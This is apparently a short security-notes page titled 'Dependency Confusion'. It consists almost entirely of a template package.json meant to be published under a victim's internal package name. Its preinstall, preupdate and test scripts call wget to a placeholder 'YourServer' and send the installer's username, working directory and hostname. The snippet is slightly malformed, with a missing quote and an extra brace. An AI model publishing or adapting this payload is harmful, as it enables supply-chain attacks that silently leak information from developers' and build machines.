Dependency Confusion

package.json

{
  "name": "====>Replace This wite The Package NAME",
  "version": "10.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "wget --quiet http://YourServer/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" ",
    "preinstall": "wget --quiet \"http://YourServer/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" ",
    "preupdate": "wget --quiet \"http://YourServer/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" "
  },
  "author": "past3ll3",
  "license": "ISC"
  }
}

Last updated

Was this helpful?